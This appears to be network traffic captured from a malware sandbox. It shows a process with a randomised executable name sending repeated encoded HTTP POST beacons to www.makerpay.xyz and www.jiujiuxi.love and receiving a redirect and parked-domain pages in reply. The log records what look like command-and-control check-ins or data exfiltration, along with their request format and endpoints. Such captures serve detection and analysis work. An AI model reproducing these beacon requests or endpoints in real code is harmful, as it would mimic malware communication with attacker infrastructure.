Nov 12, 2024 15:32:25.839689970 CET	747	OUT	POST /lp9q/ HTTP/1.1 Host: www.makerpay.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.makerpay.xyz Referer: http://www.makerpay.xyz/lp9q/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 65 69 45 55 6d 4f 57 79 51 61 74 67 31 6e 50 66 67 4d 2f 64 4d 6b 41 53 4f 59 43 4a 6b 54 46 76 33 32 38 64 68 4c 34 79 78 58 6e 64 49 63 36 30 50 44 57 36 42 68 4f 41 50 56 74 67 64 4e 6c 6d 33 5a 62 61 5a 4a 6d 68 33 6a 36 4d 53 5a 61 6e 66 51 35 6c 6b 79 52 79 2b 4d 35 47 4c 78 4e 37 30 48 2f 6b 68 31 44 77 36 66 6d 61 62 6b 62 72 52 75 32 55 53 4d 53 71 36 70 30 54 72 69 54 4d 32 4b 73 69 30 33 43 76 37 51 6a 35 6c 35 61 49 42 34 49 6b 4b 32 7a 76 36 38 66 4f 69 39 6e 63 48 2f 55 4f 79 51 30 42 4f 33 42 31 57 4e 54 4d 46 71 65 54 41 65 77 75 54 76 34 74 6b 4d 57 32 77 41 3d 3d Data Ascii: mRu=eiEUmOWyQatg1nPfgM/dMkASOYCJkTFv328dhL4yxXndIc60PDW6BhOAPVtgdNlm3ZbaZJmh3j6MSZanfQ5lkyRy+M5GLxN70H/kh1Dw6fmabkbrRu2USMSq6p0TriTM2Ksi03Cv7Qj5l5aIB4IkK2zv68fOi9ncH/UOyQ0BO3B1WNTMFqeTAewuTv4tkMW2wA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.20	49761	13.248.169.48	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:28.511244059 CET	767	OUT	POST /lp9q/ HTTP/1.1 Host: www.makerpay.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.makerpay.xyz Referer: http://www.makerpay.xyz/lp9q/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 65 69 45 55 6d 4f 57 79 51 61 74 67 36 6e 2f 66 73 4c 6a 64 62 30 41 54 51 49 43 4a 74 7a 46 72 33 32 34 64 68 4b 39 71 32 6c 54 64 49 39 4b 30 56 43 57 36 47 68 4f 41 58 46 73 4c 53 74 6c 78 33 59 6e 53 5a 4c 69 68 33 69 65 4d 53 63 2b 6e 66 6a 42 6b 72 43 52 73 33 73 35 45 50 78 4e 37 30 48 2f 6b 68 7a 76 61 36 66 2b 61 61 58 54 72 52 50 32 4c 4d 63 53 70 39 70 30 54 68 79 54 49 32 4b 74 48 30 7a 4b 4a 37 57 76 35 6c 39 57 49 42 73 63 6e 54 47 7a 70 30 63 65 38 73 73 4b 6f 4c 4d 55 44 2f 7a 45 66 41 6e 45 4b 58 62 65 57 59 59 71 33 44 4e 73 63 58 66 42 46 6d 4f 58 74 74 4e 56 6e 5a 57 4d 4c 59 4b 6e 69 42 65 37 64 79 76 58 72 35 78 41 3d Data Ascii: mRu=eiEUmOWyQatg6n/fsLjdb0ATQICJtzFr324dhK9q2lTdI9K0VCW6GhOAXFsLStlx3YnSZLih3ieMSc+nfjBkrCRs3s5EPxN70H/khzva6f+aaXTrRP2LMcSp9p0ThyTI2KtH0zKJ7Wv5l9WIBscnTGzp0ce8ssKoLMUD/zEfAnEKXbeWYYq3DNscXfBFmOXttNVnZWMLYKniBe7dyvXr5xA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.20	49762	13.248.169.48	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:31.178062916 CET	1289	OUT	POST /lp9q/ HTTP/1.1 Host: www.makerpay.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.makerpay.xyz Referer: http://www.makerpay.xyz/lp9q/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 65 69 45 55 6d 4f 57 79 51 61 74 67 36 6e 2f 66 73 4c 6a 64 62 30 41 54 51 49 43 4a 74 7a 46 72 33 32 34 64 68 4b 39 71 32 6c 72 64 4a 50 79 30 50 6c 4b 36 48 68 4f 41 4a 56 74 73 53 74 6c 73 33 59 2f 57 5a 4c 75 62 33 68 32 4d 54 2f 47 6e 58 79 42 6b 77 53 52 73 6f 38 35 48 4c 78 4e 75 30 48 76 6f 68 7a 66 61 36 66 2b 61 61 57 6a 72 59 2b 32 4c 4f 63 53 71 36 70 31 53 72 69 54 67 32 4b 46 78 30 7a 4f 2f 6e 32 50 35 6c 64 47 49 48 5a 49 6e 4d 32 7a 72 35 38 65 6b 73 73 47 33 4c 4d 4a 38 2f 79 67 6c 41 6b 55 4b 57 2f 6a 69 4d 35 71 79 56 72 74 56 65 74 35 69 77 2f 79 2b 31 4d 74 35 4a 6d 4d 6c 61 50 54 6c 4a 59 37 73 6d 4d 6a 52 67 48 5a 6d 67 59 63 5a 33 79 56 43 37 62 37 41 75 48 4c 44 34 6f 46 2b 53 59 45 5a 52 42 77 61 78 61 49 4c 6e 73 4f 77 55 4e 6e 72 63 46 65 45 72 52 59 30 32 69 72 56 48 45 43 5a 4f 51 67 71 34 74 49 38 37 6d 6a 43 64 44 69 37 74 53 35 6f 34 4e 36 44 57 61 33 55 66 69 71 71 68 4d 43 74 67 56 66 64 7a 6a 51 39 50 74 70 4e 38 58 70 36 6e 6c 34 6e 57 30 71 71 48 71 [TRUNCATED] Data Ascii: mRu=eiEUmOWyQatg6n/fsLjdb0ATQICJtzFr324dhK9q2lrdJPy0PlK6HhOAJVtsStls3Y/WZLub3h2MT/GnXyBkwSRso85HLxNu0Hvohzfa6f+aaWjrY+2LOcSq6p1SriTg2KFx0zO/n2P5ldGIHZInM2zr58ekssG3LMJ8/yglAkUKW/jiM5qyVrtVet5iw/y+1Mt5JmMlaPTlJY7smMjRgHZmgYcZ3yVC7b7AuHLD4oF+SYEZRBwaxaILnsOwUNnrcFeErRY02irVHECZOQgq4tI87mjCdDi7tS5o4N6DWa3UfiqqhMCtgVfdzjQ9PtpN8Xp6nl4nW0qqHqe2cU6KGMR9Yw4yDYwa0eho//p0XRwrNz309PYtYYtNOvvjPzDWryFDUp5bF38naRoJzpyQu/cYU7BD3KWBAvx4Q0vyh19JfQZP60CejACc2kSzwIR+HL+EfQVWcHxBcio0c3hPd8ZTkJR06kBDtCxBTkAme5C2YWeyrnnI0UJQUMDQ1+uUhB4kPKr4p/4UxaJKb7TdsKuViAFMLvsC/kLsko5gV1lryIuOwfMWuPyKDnlV2/gNayaq7UJsqmuD2y/1YQVFLE0x9hZYOtki0tDgH660pcNym1ssxHmU/U3pCH1aGIFPvuS5nFii4Qx9a7STv5JG/CW6Nmeujtjhqnxe2lAs2nG49RMpTEqcN4zgHcaq02Xpjy7ZI4NiDM/lsYyEjiR+J3TsWnyYtD9hY
Nov 12, 2024 15:32:31.178126097 CET	6627	OUT	Data Raw: 76 56 45 4c 73 4d 43 6a 64 7a 43 6f 58 49 77 39 38 4f 4d 66 4d 55 49 66 30 7a 39 47 68 7a 6c 65 39 58 67 38 4d 74 71 2b 45 59 58 6a 63 54 61 34 2f 74 35 42 6d 44 66 32 50 46 45 2b 4d 79 6d 42 57 44 5a 6e 6b 6a 49 53 70 76 52 4f 4b 6c 71 6e 42 74 Data Ascii: vVELsMCjdzCoXIw98OMfMUIf0z9Ghzle9Xg8Mtq+EYXjcTa4/t5BmDf2PFE+MymBWDZnkjISpvROKlqnBtg5xCfwzjx3NLspGkVN04/u7T+mmis72OkgLZDpyqE0Q1qSR3bky1x2x3syzX1kfm3X9aY7RUsO8mpWsMi9C5SK46Qz1PwR2syVtzrOUiZRNXPqeyJrStIK+85hNq9eAbmyey2x3h0U0cKjQ8g6IFb1tycXYTAqd6K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.20	49763	13.248.169.48	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:33.841876984 CET	475	OUT	GET /lp9q/?mRu=Tgs0l5rQdINE0HmohrfgPmtVT9TM6mRmz28qlq5N+W6TIOOkclTpEHygPFllR64ZyPP4U6P7xjaKPMS0ZS1/tTAw9ro2DSZN0V3b+mDHt47uSUTeFI2WDZw=&UJ=7H1XM HTTP/1.1 Host: www.makerpay.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:32:33.976891994 CET	388	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 12 Nov 2024 14:32:33 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 54 67 73 30 6c 35 72 51 64 49 4e 45 30 48 6d 6f 68 72 66 67 50 6d 74 56 54 39 54 4d 36 6d 52 6d 7a 32 38 71 6c 71 35 4e 2b 57 36 54 49 4f 4f 6b 63 6c 54 70 45 48 79 67 50 46 6c 6c 52 36 34 5a 79 50 50 34 55 36 50 37 78 6a 61 4b 50 4d 53 30 5a 53 31 2f 74 54 41 77 39 72 6f 32 44 53 5a 4e 30 56 33 62 2b 6d 44 48 74 34 37 75 53 55 54 65 46 49 32 57 44 5a 77 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=Tgs0l5rQdINE0HmohrfgPmtVT9TM6mRmz28qlq5N+W6TIOOkclTpEHygPFllR64ZyPP4U6P7xjaKPMS0ZS1/tTAw9ro2DSZN0V3b+mDHt47uSUTeFI2WDZw=&UJ=7H1XM"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.20	49764	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:39.359334946 CET	750	OUT	POST /yiph/ HTTP/1.1 Host: www.jiujiuxi.love Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jiujiuxi.love Referer: http://www.jiujiuxi.love/yiph/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 47 6d 79 46 50 54 6e 4c 4b 75 62 74 30 70 57 53 6e 72 46 34 72 47 51 78 38 6d 36 52 41 70 54 42 42 73 46 42 55 6b 6e 2b 53 4d 68 45 6e 6b 59 4e 4c 42 75 64 52 78 4b 6c 4a 37 38 67 62 62 59 42 62 69 5a 4d 67 39 35 5a 49 6d 49 4a 31 58 2b 61 52 55 72 58 34 5a 59 31 45 79 54 6c 50 36 69 6b 68 4a 33 53 5a 6c 73 71 33 63 6a 33 70 63 39 57 71 4e 4f 53 6e 56 74 63 6d 2b 59 6a 41 70 31 33 4c 42 65 70 44 69 54 67 34 6d 52 48 62 67 55 71 4c 35 33 49 57 48 6e 62 56 2f 48 68 7a 41 77 56 64 64 75 66 7a 53 2b 63 75 6f 55 2b 64 73 41 34 6d 53 30 47 49 38 52 59 37 70 71 34 36 49 78 54 51 51 3d 3d Data Ascii: mRu=GmyFPTnLKubt0pWSnrF4rGQx8m6RApTBBsFBUkn+SMhEnkYNLBudRxKlJ78gbbYBbiZMg95ZImIJ1X+aRUrX4ZY1EyTlP6ikhJ3SZlsq3cj3pc9WqNOSnVtcm+YjAp13LBepDiTg4mRHbgUqL53IWHnbV/HhzAwVddufzS+cuoU+dsA4mS0GI8RY7pq46IxTQQ==
Nov 12, 2024 15:32:39.496306896 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:32:39 GMT content-type: text/html; charset=utf-8 content-length: 1122 x-request-id: 094f4ea0-efda-4a15-a941-04a790237e85 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw== set-cookie: parking_session=094f4ea0-efda-4a15-a941-04a790237e85; expires=Tue, 12 Nov 2024 14:47:39 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 52 33 75 46 5a 6a 79 77 45 65 6a 58 4f 49 68 51 37 65 57 73 5a 65 59 35 66 4a 76 58 67 71 70 4f 42 43 2f 69 47 46 79 68 64 4a 53 71 35 39 42 5a 61 76 69 49 50 7a 42 72 4a 38 55 46 64 4b 44 73 57 6e 68 6b 37 4e 61 7a 6e 55 38 36 49 30 36 73 6a 36 62 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:32:39.496356964 CET	522	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDk0ZjRlYTAtZWZkYS00YTE1LWE5NDEtMDRhNzkwMjM3ZTg1IiwicGFnZV90aW1lIjoxNzMxNDIxOTU5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaml1aml1eGkubG92ZS9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.11.20	49765	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:42.036447048 CET	770	OUT	POST /yiph/ HTTP/1.1 Host: www.jiujiuxi.love Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jiujiuxi.love Referer: http://www.jiujiuxi.love/yiph/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 47 6d 79 46 50 54 6e 4c 4b 75 62 74 32 49 6d 53 71 71 46 34 6a 47 51 79 35 6d 36 52 4f 4a 54 2f 42 73 35 42 55 68 44 75 4f 70 35 45 6d 47 41 4e 4b 46 36 64 63 52 4b 6c 47 62 38 66 66 62 59 49 62 69 6c 45 67 38 46 5a 49 6d 30 4a 31 57 75 61 53 69 6a 59 71 35 59 7a 4e 53 54 37 53 71 69 6b 68 4a 33 53 5a 6c 35 4e 33 63 4c 33 70 76 6c 57 71 73 4f 52 6b 56 74 64 76 65 59 6a 45 70 31 7a 4c 42 65 50 44 6a 50 5a 34 6b 70 48 62 68 6b 71 4c 74 72 48 63 48 6e 64 59 66 47 6f 79 54 46 4b 44 70 43 71 31 56 43 36 68 49 73 6c 63 36 4e 69 37 67 41 69 4c 76 4e 71 2f 5a 54 51 34 4b 77 49 4e 55 45 64 33 49 76 6d 7a 2b 2b 46 38 4d 48 61 63 6e 4a 50 6d 4e 30 3d Data Ascii: mRu=GmyFPTnLKubt2ImSqqF4jGQy5m6ROJT/Bs5BUhDuOp5EmGANKF6dcRKlGb8ffbYIbilEg8FZIm0J1WuaSijYq5YzNST7SqikhJ3SZl5N3cL3pvlWqsORkVtdveYjEp1zLBePDjPZ4kpHbhkqLtrHcHndYfGoyTFKDpCq1VC6hIslc6Ni7gAiLvNq/ZTQ4KwINUEd3Ivmz++F8MHacnJPmN0=
Nov 12, 2024 15:32:42.173759937 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:32:41 GMT content-type: text/html; charset=utf-8 content-length: 1122 x-request-id: ab15c325-3746-4e1e-932b-ba09846e4b88 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw== set-cookie: parking_session=ab15c325-3746-4e1e-932b-ba09846e4b88; expires=Tue, 12 Nov 2024 14:47:42 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 52 33 75 46 5a 6a 79 77 45 65 6a 58 4f 49 68 51 37 65 57 73 5a 65 59 35 66 4a 76 58 67 71 70 4f 42 43 2f 69 47 46 79 68 64 4a 53 71 35 39 42 5a 61 76 69 49 50 7a 42 72 4a 38 55 46 64 4b 44 73 57 6e 68 6b 37 4e 61 7a 6e 55 38 36 49 30 36 73 6a 36 62 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:32:42.173819065 CET	522	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWIxNWMzMjUtMzc0Ni00ZTFlLTkzMmItYmEwOTg0NmU0Yjg4IiwicGFnZV90aW1lIjoxNzMxNDIxOTYyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaml1aml1eGkubG92ZS9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.11.20	49766	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:44.689193010 CET	2578	OUT	POST /yiph/ HTTP/1.1 Host: www.jiujiuxi.love Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jiujiuxi.love Referer: http://www.jiujiuxi.love/yiph/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 47 6d 79 46 50 54 6e 4c 4b 75 62 74 32 49 6d 53 71 71 46 34 6a 47 51 79 35 6d 36 52 4f 4a 54 2f 42 73 35 42 55 68 44 75 4f 70 78 45 6e 7a 63 4e 4c 69 47 64 64 52 4b 6c 59 4c 38 61 66 62 5a 61 62 69 39 41 67 38 4a 6a 49 6a 77 4a 30 32 79 61 54 51 4c 59 7a 4a 59 7a 53 43 54 6d 50 36 69 4c 68 4a 6e 57 5a 6c 70 4e 33 63 4c 33 70 70 68 57 6a 64 4f 52 69 56 74 63 6d 2b 59 6e 41 70 31 4c 4c 43 75 78 44 6a 62 4a 34 55 4a 48 61 42 30 71 59 75 44 48 51 48 6e 66 64 66 47 77 79 54 5a 76 44 74 61 4d 31 56 65 45 68 4c 63 6c 59 75 70 68 6b 43 30 45 52 2f 5a 58 77 62 7a 73 32 35 55 42 4f 54 64 6f 2b 34 4f 49 38 4c 47 6e 31 76 37 79 47 53 56 69 6c 35 47 56 36 49 59 61 6f 54 48 4d 38 44 33 33 31 36 4c 74 7a 79 56 41 52 6e 65 51 39 43 4f 6a 51 44 72 54 4d 71 51 30 6a 79 4a 36 78 38 68 56 30 53 4c 75 63 30 6f 53 79 5a 6e 46 64 69 55 72 48 48 77 30 31 56 52 79 37 54 6c 77 7a 41 45 76 55 64 51 42 55 32 53 45 66 5a 59 58 43 42 47 34 57 67 43 35 66 6b 79 4b 50 35 6a 50 30 4a 4b 4f 62 61 4f 4b 67 68 59 48 4b 48 [TRUNCATED] Data Ascii: mRu=GmyFPTnLKubt2ImSqqF4jGQy5m6ROJT/Bs5BUhDuOpxEnzcNLiGddRKlYL8afbZabi9Ag8JjIjwJ02yaTQLYzJYzSCTmP6iLhJnWZlpN3cL3pphWjdORiVtcm+YnAp1LLCuxDjbJ4UJHaB0qYuDHQHnfdfGwyTZvDtaM1VeEhLclYuphkC0ER/ZXwbzs25UBOTdo+4OI8LGn1v7yGSVil5GV6IYaoTHM8D3316LtzyVARneQ9COjQDrTMqQ0jyJ6x8hV0SLuc0oSyZnFdiUrHHw01VRy7TlwzAEvUdQBU2SEfZYXCBG4WgC5fkyKP5jP0JKObaOKghYHKHsS+nUbbTDSBkISxgIUhe/gXxqoPPJF6eJlxDuZberzROeg/p2e7ZG2y0WALJLNJM4KYpK6FReEafb30ZqhokUCsdQcUVkuEAiwaDH1J4GCkGWZgzu/OpBA9xVUQCC6Wk34BkndbutBB4LuqFkIfcYFIHjYJjSttPiZE/zzqt93VfJ4c6YYjTkTfkGTgoxOzlSFzeSGKqQFkO6uMu0KprLjuzVHFHj9AVIT+KBsilalKXxzxVUusKn72csuBCh8gnAbDHZtlH/CpG/enLKYs7SyJW25g3lp7hfgLC1LC/viop1uQvHSoHXx8yHS8cYAT5Uj9oSTeUasQ3pr9XZjHkYvxmCheGPyKkB0nm6nzmMvnNWESrIt6BisacOO+2b39EYTF0G6NjOsbwCcqVvZQ5WULElFO0JgM0UI39IKmXXesBpfR/q4cJH63L2+WTD/qxadEHnl82iuSWW0zt7GmUuibFXKtQ0v+gRJBglEvIvvRWx/d/EwAF6HAodpKRUHFzpfmHRgjhgxJ3qkUbNO+dvYNrKkj08oJ6ekgz/T1ECUIDSk5yrBwVw0KZbIw9CYG3Ie9RCVK1Pt4Cesaa4rfm8uuJg2PKVw6eBH2+RmfQQdVZ8PxIUCZcCQJvHU/6jQd+PQZN7BKE2ZT8fv8NVHvccAUhqtCDxIsUiq [TRUNCATED]
